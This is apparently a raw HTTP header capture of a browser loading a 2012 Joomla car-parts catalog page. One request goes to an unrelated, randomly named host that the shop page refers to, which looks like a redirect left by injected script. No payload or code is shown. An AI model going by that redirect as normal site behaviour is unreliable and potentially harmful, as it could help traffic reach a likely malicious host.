Date: Thu, 08 Nov 2012 02:26:09 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 20:35:14 GMT
Etag: &quot;fff193-8877-4d4b1182&quot;
Accept-Ranges: bytes
Content-Length: 34935
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /catalog/media/system/js/modal.js HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 02:26:09 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 06 Jan 2011 06:52:19 GMT
Etag: &quot;1003fda-295c-4d2566a3&quot;
Accept-Ranges: bytes
Content-Length: 10588
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
GET /catalog/ HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Date: Thu, 08 Nov 2012 02:26:08 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 1 Jan 2001 00:00:00 GMT
P3P: CP=&quot;NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM&quot;
Pragma: no-cache
X-Powered-By: PHP/5.2.17
Set-Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5; path=/
Last-Modified: Thu, 08 Nov 2012 02:26:09 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /catalog/templates/yoo_crystal/lib/js/addons/base.js HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 02:26:09 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:42 GMT
Etag: &quot;1005494-6e2-4d4af182&quot;
Accept-Ranges: bytes
Content-Length: 1762
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/lib/js/addons/accordionmenu.js HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 02:26:09 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:42 GMT
Etag: &quot;1005493-535-4d4af182&quot;
Accept-Ranges: bytes
Content-Length: 1333
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/lib/js/addons/fancymenu.js HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 02:26:09 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:42 GMT
Etag: &quot;1005496-9cd-4d4af182&quot;
Accept-Ranges: bytes
Content-Length: 2509
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/lib/js/addons/dropdownmenu.js HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 02:26:09 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:42 GMT
Etag: &quot;1005495-a28-4d4af182&quot;
Accept-Ranges: bytes
Content-Length: 2600
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/lib/js/template.js HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 02:26:09 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:42 GMT
Etag: &quot;1005491-cba-4d4af182&quot;
Accept-Ranges: bytes
Content-Length: 3258
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/assets/js/btloader.min.js HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 02:26:10 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 18 Apr 2012 20:39:34 GMT
Etag: &quot;1009b01-747-4f8f2686&quot;
Accept-Ranges: bytes
Content-Length: 1863
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
GET /catalog/modules/mod_zooslider/mod_zooslider.js HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 02:26:10 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 06 Jan 2011 07:07:35 GMT
Etag: &quot;1004a5d-5aa-4d256a37&quot;
Accept-Ranges: bytes
Content-Length: 1450
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/css/reset.css HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/template.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 02:26:10 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:42 GMT
Etag: &quot;10053a2-b2d-4d4af182&quot;
Accept-Ranges: bytes
Content-Length: 2861
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/css/layout.css HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/template.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 02:26:10 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 19 Apr 2012 23:01:20 GMT
Etag: &quot;100539e-1b0c-4f909940&quot;
Accept-Ranges: bytes
Content-Length: 6924
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
GET /catalog/plugins/system/yoo_effects/yoo_effects.js.php?lb=1&re=1&sl=1 HTTP/1.1

Host: jdmsport.com
GET /catalog/plugins/system/yoo_effects/yoo_effects.js.php?lb=1&amp;re=1&amp;sl=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 02:26:10 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Content-Encoding: gzip
Expires: Fri, 09 Nov 2012 02:26:10 GMT
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.17
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /catalog/templates/yoo_crystal/css/typography.css HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/template.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 02:26:10 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 19 Apr 2012 23:09:14 GMT
Etag: &quot;10053a5-1662-4f909b1a&quot;
Accept-Ranges: bytes
Content-Length: 5730
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/css/menus.css HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/template.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 02:26:10 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:42 GMT
Etag: &quot;100539f-204c-4d4af182&quot;
Accept-Ranges: bytes
Content-Length: 8268
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/css/modules.css HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/template.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 02:26:10 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:42 GMT
Etag: &quot;10053a0-36a4-4d4af182&quot;
Accept-Ranges: bytes
Content-Length: 13988
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/css/joomla.css HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/template.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 02:26:10 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:42 GMT
Etag: &quot;100539d-2dc5-4d4af182&quot;
Accept-Ranges: bytes
Content-Length: 11717
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/css/extensions.css HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/template.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 02:26:10 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:42 GMT
Etag: &quot;1005399-29c0-4d4af182&quot;
Accept-Ranges: bytes
Content-Length: 10688
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
GET /catalog/media/zoo/applications/blog/templates/default/assets/css/category.css HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/media/zoo/applications/blog/templates/default/assets/css/zoo.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 02:26:10 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 06 Jan 2011 06:54:06 GMT
Etag: &quot;100400c-1162-4d25670e&quot;
Accept-Ranges: bytes
Content-Length: 4450
Keep-Alive: timeout=15, max=94
Connection: Keep-Alive
GET /catalog/media/zoo/applications/blog/templates/default/assets/css/item.css HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/media/zoo/applications/blog/templates/default/assets/css/zoo.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 02:26:10 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 06 Jan 2011 06:54:06 GMT
Etag: &quot;100400e-f19-4d25670e&quot;
Accept-Ranges: bytes
Content-Length: 3865
Keep-Alive: timeout=15, max=94
Connection: Keep-Alive
GET /catalog/media/zoo/applications/blog/templates/default/assets/css/author.css HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/media/zoo/applications/blog/templates/default/assets/css/zoo.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 02:26:10 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 06 Jan 2011 06:54:05 GMT
Etag: &quot;100400b-57e-4d25670d&quot;
Accept-Ranges: bytes
Content-Length: 1406
Keep-Alive: timeout=15, max=94
Connection: Keep-Alive
GET /catalog/media/zoo/applications/blog/templates/default/assets/css/submission.css HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/media/zoo/applications/blog/templates/default/assets/css/zoo.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: text/css
Date: Thu, 08 Nov 2012 02:26:10 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 06 Jan 2011 06:54:06 GMT
Etag: &quot;100400f-30d-4d25670e&quot;
Accept-Ranges: bytes
Content-Length: 781
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/lib/js/mootools.js HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 02:26:09 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:42 GMT
Etag: &quot;1005490-fe18-4d4af182&quot;
Accept-Ranges: bytes
Content-Length: 65048
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
GET /catalog/images/M_images/jdmbanner16.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:10 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Tue, 28 Feb 2012 22:18:20 GMT
Etag: &quot;fff8fa-1d68b-4f4d52ac&quot;
Accept-Ranges: bytes
Content-Length: 120459
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/images/72/slideshow/jdmbannerneochromelugnuts.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:10 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Tue, 29 May 2012 22:56:15 GMT
Etag: &quot;1009ba6-25486-4fc5540f&quot;
Accept-Ranges: bytes
Content-Length: 152710
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/images/72/slideshow/jdmbannerneochrometowhooks.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:10 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 23 May 2012 21:35:05 GMT
Etag: &quot;1009b56-23645-4fbd5809&quot;
Accept-Ranges: bytes
Content-Length: 144965
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
GET /t/vc.php?go=2 HTTP/1.1

Host: gqftitjox.kwik.to

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: text/html
Date: Thu, 08 Nov 2012 02:34:54 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze14
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/images/72/slideshow/jdmbannerdrifthandbrake.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:10 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Fri, 20 Jul 2012 01:58:59 GMT
Etag: &quot;1009bb4-2e8ac-5008bb63&quot;
Accept-Ranges: bytes
Content-Length: 190636
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/assets/skitter/js/jquery.skitter.min.js HTTP/1.1

Host: jdmsport.com

